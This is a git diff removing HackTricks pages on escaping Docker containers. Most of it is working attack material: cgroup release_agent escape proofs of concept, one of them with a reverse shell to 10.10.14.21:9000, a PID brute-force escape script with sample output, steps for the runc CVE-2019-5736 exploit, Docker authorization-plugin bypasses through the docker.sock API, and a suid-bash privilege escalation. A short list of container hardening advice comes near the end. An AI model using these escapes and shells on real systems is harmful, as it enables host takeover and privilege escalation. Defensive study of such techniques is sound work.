directory listing below. - -``` -root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x -root@b11cf9eab4fd:/# ls /tmp/cgrp/ -cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x -root@b11cf9eab4fd:/# ls /tmp/cgrp/x -cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks -``` - -Next, we enable cgroup notifications on release of the β€œx” cgroup by writing a 1 to its `notify_on_release` file. We also set the RDMA cgroup release agent to execute a `/cmd` script β€” which we will later create in the container β€” by writing the `/cmd` script path on the host to the `release_agent` file. To do it, we’ll grab the container’s path on the host from the `/etc/mtab` file. - -The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host. - -Those operations can be seen below: - -``` -root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release -root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent -``` - -Note the path to the `/cmd` script, which we are going to create on the host: - -``` -root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent -/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd -``` - -Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents: - -``` -root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd -root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd -root@b11cf9eab4fd:/# chmod a+x /cmd -root@b11cf9eab4fd:/# cat /cmd -#!/bin/sh -ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output -``` - -Finally, we can execute the attack by spawning a process that immediately ends inside the β€œx” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in β€œx” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container: - -``` -root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" -root@b11cf9eab4fd:/# head /output -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init -root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd] -root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp] -root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp] -root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd] -root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] -root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] -root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] -root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0] -``` - -# `--privileged` flag v2 - -The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point. - -## Kata Containers - -``` -root@container:~$ head -1 /etc/mtab -kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virtio) -``` - -[Kata Containers](https://katacontainers.io) by default mounts the root fs of a container over `9pfs`. This discloses no information about the location of the container file system in the Kata Containers Virtual Machine. - -\* More on Kata Containers in a future blog post. - -## Device Mapper - -``` -root@container:~$ head -1 /etc/mtab -/dev/sdc / ext4 rw,relatime,stripe=384 0 0 -``` - -I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment. - -## An Alternative PoC - -Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity. - -The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere. - -### Proc to the Rescue - -The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container - -```bash -root@container:~$ sleep 100 -``` - -```bash -root@host:~$ ps -eaf | grep sleep -root 28936 28909 0 10:11 pts/0 00:00:00 sleep 100 -root@host:~$ ls -la /proc/`pidof sleep` -total 0 -dr-xr-xr-x 9 root root 0 Nov 19 10:03 . -dr-xr-xr-x 430 root root 0 Nov 9 15:41 .. -dr-xr-xr-x 2 root root 0 Nov 19 10:04 attr --rw-r--r-- 1 root root 0 Nov 19 10:04 autogroup --r-------- 1 root root 0 Nov 19 10:04 auxv --r--r--r-- 1 root root 0 Nov 19 10:03 cgroup ---w------- 1 root root 0 Nov 19 10:04 clear_refs --r--r--r-- 1 root root 0 Nov 19 10:04 cmdline -... --rw-r--r-- 1 root root 0 Nov 19 10:29 projid_map -lrwxrwxrwx 1 root root 0 Nov 19 10:29 root -> / --rw-r--r-- 1 root root 0 Nov 19 10:29 sched -... -``` - -_As an aside, the `/proc//root` data structure is one that confused me for a very long time, I could never understand why having a symbolic link to `/` was useful, until I read the actual definition in the man pages:_ - -> /proc/\[pid]/root -> -> UNIX and Linux support the idea of a per-process root of the filesystem, set by the chroot(2) system call. This file is a symbolic link that points to the process’s root directory, and behaves in the same way as exe, and fd/\*. -> -> Note however that this file is not merely a symbolic link. It provides the same view of the filesystem (including namespaces and the set of per-process mounts) as the process itself. - -The `/proc//root` symbolic link can be used as a host relative path to any file within a container:Container - -```bash -root@container:~$ echo findme > /findme -root@container:~$ sleep 100 -``` - -```bash -root@host:~$ cat /proc/`pidof sleep`/root/findme -findme -``` - -This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container. - -### Pid Bashing - -This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container - -``` -root@container:~$ echo findme > /findme -root@container:~$ sleep 100 -``` - -Host - -```bash -root@host:~$ COUNTER=1 -root@host:~$ while [ ! -f /proc/${COUNTER}/root/findme ]; do COUNTER=$((${COUNTER} + 1)); done -root@host:~$ echo ${COUNTER} -7822 -root@host:~$ cat /proc/${COUNTER}/root/findme -findme -``` - -### Putting it All Together - -To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created. - -The only caveat with this technique is it is in no way shape or form subtle, and can increase the pid count very high. As no long running processes are kept running this _should_ not cause reliability issues, but don’t quote me on that. - -The below PoC implements these techniques to provide a more generic attack than first presented in Felix’s original PoC for escaping a privileged container using the cgroups `release_agent` functionality: - -```bash -#!/bin/sh - -OUTPUT_DIR="/" -MAX_PID=65535 -CGROUP_NAME="xyx" -CGROUP_MOUNT="/tmp/cgrp" -PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" -PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" -OUTPUT_NAME="${CGROUP_NAME}_payload.out" -OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" - -# Run a process for which we can search for (not needed in reality, but nice to have) -sleep 10000 & - -# Prepare the payload script to execute on the host -cat > ${PAYLOAD_PATH} << __EOF__ -#!/bin/sh - -OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} - -# Commands to run on the host< -ps -eaf > \${OUTPATH} 2>&1 -__EOF__ - -# Make the payload script executable -chmod a+x ${PAYLOAD_PATH} - -# Set up the cgroup mount using the memory resource cgroup controller -mkdir ${CGROUP_MOUNT} -mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} -mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} -echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release - -# Brute force the host pid until the output path is created, or we run out of guesses -TPID=1 -while [ ! -f ${OUTPUT_PATH} ] -do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) -done - -# Wait for and cat the output -sleep 1 -echo "Done! Output:" -cat ${OUTPUT_PATH} -``` - -Executing the PoC within a privileged container should provide output similar to: - -```bash -root@container:~$ ./release_agent_pid_brute.sh -Checking pid 100 -Checking pid 200 -Checking pid 300 -Checking pid 400 -Checking pid 500 -Checking pid 600 -Checking pid 700 -Checking pid 800 -Checking pid 900 -Checking pid 1000 -Checking pid 1100 -Checking pid 1200 - -Done! Output: -UID PID PPID C STIME TTY TIME CMD -root 1 0 0 11:25 ? 00:00:01 /sbin/init -root 2 0 0 11:25 ? 00:00:00 [kthreadd] -root 3 2 0 11:25 ? 00:00:00 [rcu_gp] -root 4 2 0 11:25 ? 00:00:00 [rcu_par_gp] -root 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events] -root 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd] -root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] -root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] -... -``` - -# Runc exploit (CVE-2019-5736) - -In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload. - -Change the payload accordingly and build the main.go with `go build main.go`. The resulting binary should be placed in the docker container for execution.\ -Upon execution, as soon as it displays `[+] Overwritten /bin/sh successfully` you need to execute the following from the host machine: - -`docker exec -it /bin/sh` - -This will trigger the payload which is present in the main.go file. - -For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) - -# Docker Auth Plugin Bypass - -In some occasions, the sysadmin may install some plugins to docker to avoid low privilege users to interact with docker without being able to escalate privileges. - -## disallowed `run --privileged` - -In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: - -```bash -docker run -d --privileged modified-ubuntu -docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed. -See 'docker run --help'. -``` - -However, a user can **create a shell inside the running container and give it the extra privileges**: - -```bash -docker run -d --security-opt "seccomp=unconfined" ubuntu -#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de -docker exec -it --privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de bash -``` - -Now, the user can escape from the container using any of the previously discussed techniques and escalate privileges inside the host. - -## Mount Writable Folder - -In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: - -```bash -host> cp /bin/bash /tmp #Cerate a copy of bash -host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell -docker container> chown root:root /host/bash -docker container> chmod u+s /host/bash -host> /tmp/bash - -p #This will give you a shell as root -``` - -{% hint style="info" %} -Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` - -**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. - -Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) -{% endhint %} - -## Unchecked JSON Structure - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the API ([https://docs.docker.com/engine/api/v1.40/#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)) like "**Binds**".\ -In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: - -```bash -docker version #First, find the API version of docker, 1.40 in this example -docker images #List the images available -#Then, a container that mounts the root folder of the host -curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "Binds":["/:/host"]}' http:/v1.40/containers/create -docker start f6932bc153ad #Start the created privileged container -docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it -#You can access the host filesystem -``` - -## Unchecked JSON Attribute - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parametter** of the API ([https://docs.docker.com/engine/api/v1.40/#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability: - -```bash -docker version -curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create -docker start c52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fa -docker ps -docker exec -it c52a77629a91 bash -capsh --print -#You can abuse the SYS_MODULE capability -``` - -# Writable hostPath Mount - -(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: - -```bash -### Check if You Can Write to a File-system -$ echo 1 > /proc/sysrq-trigger - -### Check root UUID -$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem -$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem -$ mkdir /mnt-test -$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now. - -### debugfs (Interactive File System Debugger) -$ debugfs /dev/sda1 -``` - -# Containers Security Improvements - -## Seccomp in Docker - -This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: - -{% content-ref url="seccomp.md" %} -[seccomp.md](seccomp.md) -{% endcontent-ref %} - -## AppArmor in Docker - -This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: - -{% content-ref url="apparmor.md" %} -[apparmor.md](apparmor.md) -{% endcontent-ref %} - -## AuthZ & AuthN - -An authorization plugin **approves** or **denies** **requests** to the Docker **daemon** based on both the current **authentication** context and the **command** **context**. The **authentication** **context** contains all **user details** and the **authentication** **method**. The **command context** contains all the **relevant** **request** data. - -{% content-ref url="broken-reference" %} -[Broken link](broken-reference) -{% endcontent-ref %} - -## gVisor - -**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. - -{% embed url="https://github.com/google/gvisor" %} - -# Kata Containers - -**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide** stronger workload isolation using hardware virtualization** technology as a second layer of defense. - -{% embed url="https://katacontainers.io/" %} - -## Use containers securely - -Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary. - -To help keep containers secure: - -* Do not use the `--privileged` flag or mount a [Docker socket inside the container](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/). The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. -* Do not run as root inside the container. Use a [different user](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) or [user namespaces](https://docs.docker.com/engine/security/userns-remap/). The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. -* [Drop all capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) (`--cap-drop=all`) and enable only those that are required (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. -* [Use the β€œno-new-privileges” security option](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* [Limit resources available to the container](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources). Resource limits can protect the machine from denial of service attacks. -* Adjust [seccomp](https://docs.docker.com/engine/security/seccomp/), [AppArmor](https://docs.docker.com/engine/security/apparmor/) (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required. -* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. -* Regularly rebuild your images to apply security patches. This goes without saying. - -# References - -* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) -* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936) -* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md deleted file mode 100644 index 355dd23d8..000000000 --- a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md +++ /dev/null @@ -1,383 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -# `--privileged` flag - -{% code title="Initial PoC" %} -```bash -# spawn a new container to exploit via: -# docker run --rm -it --privileged ubuntu bash - -d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` -mkdir -p $d/w;echo 1 >$d/w/notify_on_release -t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -touch /o; -echo $t/c >$d/release_agent; -echo "#!/bin/sh $1 >$t/o" >/c; -chmod +x /c; -sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o -``` -{% endcode %} - -{% code title="Second PoC" %} -```bash -# On the host -docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash - -# In the container -mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -echo 1 > /tmp/cgrp/x/notify_on_release -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -echo "$host_path/cmd" > /tmp/cgrp/release_agent - -#For a normal PoC ================= -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#=================================== -#Reverse shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd -chmod a+x /cmd -#=================================== - -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" -head /output -``` -{% endcode %} - - The `--privileged` flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. - -In fact, `--privileged` provides far more permissions than needed to escape a docker container via this method. In reality, the β€œonly” requirements are: - -1. We must be running as root inside the container -2. The container must be run with the `SYS_ADMIN` Linux capability -3. The container must lack an AppArmor profile, or otherwise allow the `mount` syscall -4. The cgroup v1 virtual filesystem must be mounted read-write inside the container - -The `SYS_ADMIN` capability allows a container to perform the mount syscall \(see [man 7 capabilities](https://linux.die.net/man/7/capabilities)\). [Docker starts containers with a restricted set of capabilities](https://docs.docker.com/engine/security/security/#linux-kernel-capabilities) by default and does not enable the `SYS_ADMIN` capability due to the security risks of doing so. - -Further, Docker [starts containers with the `docker-default` AppArmor](https://docs.docker.com/engine/security/apparmor/#understand-the-policies) policy by default, which [prevents the use of the mount syscall](https://github.com/docker/docker-ce/blob/v18.09.8/components/engine/profiles/apparmor/template.go#L35) even when the container is run with `SYS_ADMIN`. - -A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` - -## Breaking down the proof of concept - -Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works. - -To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. - -To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named β€œx” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers. - -If you’re following along and get β€œmount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change `rdma` to `memory` to fix it. We’re using RDMA because the original PoC was only designed to work with it. - -Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another. - -We can see the β€œx” child cgroup creation and its directory listing below. - -```text -root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x -root@b11cf9eab4fd:/# ls /tmp/cgrp/ -cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x -root@b11cf9eab4fd:/# ls /tmp/cgrp/x -cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks -``` - -Next, we enable cgroup notifications on release of the β€œx” cgroup by writing a 1 to its `notify_on_release` file. We also set the RDMA cgroup release agent to execute a `/cmd` script β€” which we will later create in the container β€” by writing the `/cmd` script path on the host to the `release_agent` file. To do it, we’ll grab the container’s path on the host from the `/etc/mtab` file. - -The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host. - -Those operations can be seen below: - -```text -root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release -root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent -``` - -Note the path to the `/cmd` script, which we are going to create on the host: - -```text -root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent -/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd -``` - -Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents: - -```text -root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd -root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd -root@b11cf9eab4fd:/# chmod a+x /cmd -root@b11cf9eab4fd:/# cat /cmd -#!/bin/sh -ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output -``` - -Finally, we can execute the attack by spawning a process that immediately ends inside the β€œx” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in β€œx” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container: - -```text -root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" -root@b11cf9eab4fd:/# head /output -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init -root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd] -root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp] -root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp] -root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd] -root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] -root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] -root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] -root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0] -``` - -# `--privileged` flag v2 - -The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point. - -## Kata Containers - -```text -root@container:~$ head -1 /etc/mtab -kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virtio) -``` - -[Kata Containers](https://katacontainers.io/) by default mounts the root fs of a container over `9pfs`. This discloses no information about the location of the container file system in the Kata Containers Virtual Machine. - -\* More on Kata Containers in a future blog post. - -## Device Mapper - -```text -root@container:~$ head -1 /etc/mtab -/dev/sdc / ext4 rw,relatime,stripe=384 0 0 -``` - -I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment. - -## An Alternative PoC - -Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity. - -The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere. - -### Proc to the Rescue - -The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container - -```bash -root@container:~$ sleep 100 -``` - -```bash -root@host:~$ ps -eaf | grep sleep -root 28936 28909 0 10:11 pts/0 00:00:00 sleep 100 -root@host:~$ ls -la /proc/`pidof sleep` -total 0 -dr-xr-xr-x 9 root root 0 Nov 19 10:03 . -dr-xr-xr-x 430 root root 0 Nov 9 15:41 .. -dr-xr-xr-x 2 root root 0 Nov 19 10:04 attr --rw-r--r-- 1 root root 0 Nov 19 10:04 autogroup --r-------- 1 root root 0 Nov 19 10:04 auxv --r--r--r-- 1 root root 0 Nov 19 10:03 cgroup ---w------- 1 root root 0 Nov 19 10:04 clear_refs --r--r--r-- 1 root root 0 Nov 19 10:04 cmdline -... --rw-r--r-- 1 root root 0 Nov 19 10:29 projid_map -lrwxrwxrwx 1 root root 0 Nov 19 10:29 root -> / --rw-r--r-- 1 root root 0 Nov 19 10:29 sched -... -``` - -_As an aside, the `/proc//root` data structure is one that confused me for a very long time, I could never understand why having a symbolic link to `/` was useful, until I read the actual definition in the man pages:_ - -> /proc/\[pid\]/root -> -> UNIX and Linux support the idea of a per-process root of the filesystem, set by the chroot\(2\) system call. This file is a symbolic link that points to the process’s root directory, and behaves in the same way as exe, and fd/\*. -> -> Note however that this file is not merely a symbolic link. It provides the same view of the filesystem \(including namespaces and the set of per-process mounts\) as the process itself. - -The `/proc//root` symbolic link can be used as a host relative path to any file within a container:Container - -```bash -root@container:~$ echo findme > /findme -root@container:~$ sleep 100 -``` - -```bash -root@host:~$ cat /proc/`pidof sleep`/root/findme -findme -``` - -This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container. - -### Pid Bashing - -This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container - -```text -root@container:~$ echo findme > /findme -root@container:~$ sleep 100 -``` - -Host - 